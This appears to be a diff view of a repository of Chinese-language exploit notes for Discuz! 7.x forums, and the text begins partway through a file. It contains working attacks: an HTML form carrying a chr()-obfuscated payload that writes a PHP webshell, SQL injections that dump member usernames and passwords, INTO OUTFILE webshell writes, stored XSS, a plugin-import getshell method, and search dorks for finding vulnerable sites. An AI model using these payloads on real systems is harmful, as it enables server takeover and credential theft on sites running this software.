$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&amp;', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化可以自定义from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
......
}
二、DZ的全局机制导致了未初始化的参数可以任意提交
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
三、misc.php正好有个可以自定义message的点其实也是未初始化
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response没有初始化可以自定义from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(':', $message);然后message可以自己控制于是就很容易了参数是两个自定义的数组。
下面是HTML测试代码
<form method="post" action="http://bbs.XXXX.com/misc.php" enctype="multipart/form-data">
帖子ID指定一个存在的帖子即可<input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>
forumdata/cache/usergroup_01.php cmd 生成的一句话

64
CMS/Discuz/discuz7/Discuz! 7.2-X1 心情墙插件SQL注入及持久型XSS漏洞.txt Normal file
View File

@ -0,0 +1,64 @@
Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞
[Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞 全文]
简要描述:
Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞。
SQL注入比较鸡肋要求GPC为off目前这样的网站几乎绝版了
XSS因为是持久型的只要管理员打开此应用即会触发。利用XSS怎么操作就见仁见智了。
详细说明:
由Discuz认证的http://addons.discuz.com/workroom.php第三方开发团队“潮流少年工作室 Teen Studio”出品的心情墙插件http://www.discuz.net/forum.php?mod=viewthread&tid=1632898因变量未初始化及过滤不严导致SQL注入及跨站脚本漏洞。
moodwall.inc.php
SQL注入,除下面代码这一处外,本文件还有很多处这样的或是$_POST得到后直接用的情况。惨不忍睹。
elseif($action == ''edit_mood'' && moodid) {
//moodid未初始化直接代入sql查询
$check = $db->result_first("SELECT * FROM {$tablepre}moodwall WHERE id=''$moodid'' AND uid=''$discuz_uid''");
if(!$check || !$moodid) {
showmessage(''moodwall:moodwall_inc_php_2'', ''plugin.php?id=moodwall&action=user_mood'');
}
$sql = "SELECT * FROM {$tablepre}moodwall WHERE id=''$moodid''";
$query = $db->query($sql);
$moodlist_edit = array();
while($mood_edit = $db->fetch_array($query)) {
$moodlist_edit[] = $mood_edit;
}
XSS
$uid=$_POST[uid];
$username=$_POST[username];
$bgpic=$_POST[bgpic];
$mood=$_POST[mood];
$message=$_POST[message];
$dateline=time();
//$_POST得到数据直接入库前端出库代码也没有做过滤这里就不贴了。
$db->query("INSERT INTO {$tablepre}moodwall (uid,username, bgpic, mood, message, dateline) VALUES (''$uid'', ''$username'', ''$bgpic'', ''$mood'', ''$message'', ''$dateline'')");
漏洞证明:
随意找一个安装此应用的网站:
/plugin.php?id=moodwall&action=edit_mood&moodid=2''
发表心情处直接插入html代码
"><script>alert(/xss/)</script>

9
CMS/Discuz/discuz7/Discuz!账号发放插件注入0day.txt Normal file
View File

@ -0,0 +1,9 @@
Discuz!账号发放插件注入0day
件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
作者CN.Tnik&Tojen(俺俩老乡)
版本:最新版
Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php

20
CMS/Discuz/discuz7/Discuz7.X通杀0day漏洞(UCenter Home-2.0).txt Normal file
View File

@ -0,0 +1,20 @@
Discuz7.X通杀0day漏洞(UCenter Home-2.0)
2012年7月16日
评论发表评论
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&amp;shopid=
Vuln file : Shop.php
===================================================================
利用POC
shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

12
CMS/Discuz/discuz7/discuz x1.5 discuz 7.2 后台getshell 0day通杀0day.txt Normal file
View File

@ -0,0 +1,12 @@
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day
discuz x1.5 discuz 7.2 后台getshell 0day通杀版
方法为:
后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)
然后确认
shell地址就为data/plugindata/shell.lang.php (discuz x1.5 )
shell地址就为forumdata/plugins/shell.lang.php (discuz 7.2)
http://www.st999.cn/blog/tools/discuzshell.rar

32
CMS/Discuz/discuz7/discuz! 7.2 manyou插件暴路径&Get Webshell 0day.txt Normal file
View File

@ -0,0 +1,32 @@
discuz! 7.2 manyou插件暴路径&Get Webshell 0day
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中没有对传入的参数进行检查在GPC为off的情况下导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

BIN
CMS/Discuz/dz/MSWINSCK.OCX Normal file
View File

Binary file not shown.

BIN
CMS/Discuz/dz/dz.exe Normal file
View File

Binary file not shown.